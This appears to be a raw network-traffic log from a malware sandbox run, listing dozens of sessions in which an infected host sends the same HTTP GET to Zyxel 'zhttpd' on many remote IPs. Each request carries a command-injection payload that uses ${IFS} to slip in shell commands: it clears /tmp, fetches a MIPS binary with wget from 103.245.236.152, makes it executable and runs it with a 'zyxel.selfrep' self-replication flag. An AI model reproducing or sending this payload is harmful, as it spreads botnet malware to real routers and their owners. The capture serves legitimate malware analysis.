                                      Jan 14, 2024 15:50:46.305558920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4411192.168.2.145914073.35.40.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.305608988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4412192.168.2.1444408175.85.233.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.305663109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4413192.168.2.143692238.118.7.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.305722952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4414192.168.2.1446284130.169.105.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.305778027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4415192.168.2.1446874149.172.95.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.305847883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4416192.168.2.145188238.225.169.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.305910110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4417192.168.2.1432976125.192.216.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.305972099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4418192.168.2.143802223.83.170.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306041002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4419192.168.2.1432966223.128.125.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306071043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4420192.168.2.1458014161.122.181.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306129932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4421192.168.2.1447390125.76.239.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306204081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4422192.168.2.1456864217.98.81.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306237936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4423192.168.2.144421613.219.145.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306288958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4424192.168.2.144453220.113.148.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306349993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4425192.168.2.1435004161.4.106.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306411982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4426192.168.2.143409499.225.182.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306449890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4427192.168.2.1447220201.46.185.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306499004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4428192.168.2.1454732103.137.171.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306550026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4429192.168.2.145245091.48.134.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306627989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4430192.168.2.144694494.159.3.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306647062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4431192.168.2.1457842173.9.144.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306704998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4432192.168.2.144338213.191.174.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306747913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4433192.168.2.144436467.103.41.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306814909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4434192.168.2.1434804123.144.99.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306881905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4435192.168.2.1435066106.126.0.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306952000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4436192.168.2.143426812.82.4.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.306978941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4437192.168.2.144907236.250.228.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.307020903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4438192.168.2.143864670.167.146.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.307071924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4439192.168.2.1442888190.185.205.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.307132006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4440192.168.2.1454708141.186.18.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.307173967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4441192.168.2.144641667.144.14.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.307259083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4442192.168.2.1451466180.62.187.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.307298899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4443192.168.2.1453514159.100.160.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.307354927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4444192.168.2.145927879.247.239.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.307432890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4445192.168.2.1440348105.37.113.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.311913967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4446192.168.2.1441194128.169.152.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.312515974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4447192.168.2.1450114140.104.165.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.312570095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4448192.168.2.143718663.69.112.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.312695026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4449192.168.2.1437824176.244.172.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.312762022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4450192.168.2.1436386111.208.106.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.312815905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4451192.168.2.143727231.167.162.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.312875986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4452192.168.2.14427065.56.1.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.312922955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4453192.168.2.1454016130.179.144.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.312969923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4454192.168.2.1450766169.237.46.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:46.313040018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4455192.168.2.1453906132.9.149.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.312613964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4456192.168.2.143879896.82.153.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.312767982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4457192.168.2.1450440136.14.8.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.312799931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4458192.168.2.1437068141.149.248.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.312875032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4459192.168.2.1434840211.184.196.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.312937021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4460192.168.2.143763817.84.56.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.312973976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4461192.168.2.1434458154.124.102.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.313045025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4462192.168.2.144901491.73.46.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.313085079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4463192.168.2.143373479.110.123.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.313137054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4464192.168.2.1434176104.208.0.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.313199997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4465192.168.2.1459714188.40.8.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.313262939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4466192.168.2.144413680.234.217.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.313318014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4467192.168.2.1449332194.250.38.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.313385010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4468192.168.2.14528065.156.65.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.313441038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4469192.168.2.1451784134.65.149.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.313508987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4470192.168.2.144624840.140.137.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.313559055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4471192.168.2.1457592200.198.91.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.313612938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4472192.168.2.1438950143.91.54.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.313693047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4473192.168.2.144730063.130.47.55443
                                      TimestampBytes transferredDirectionData
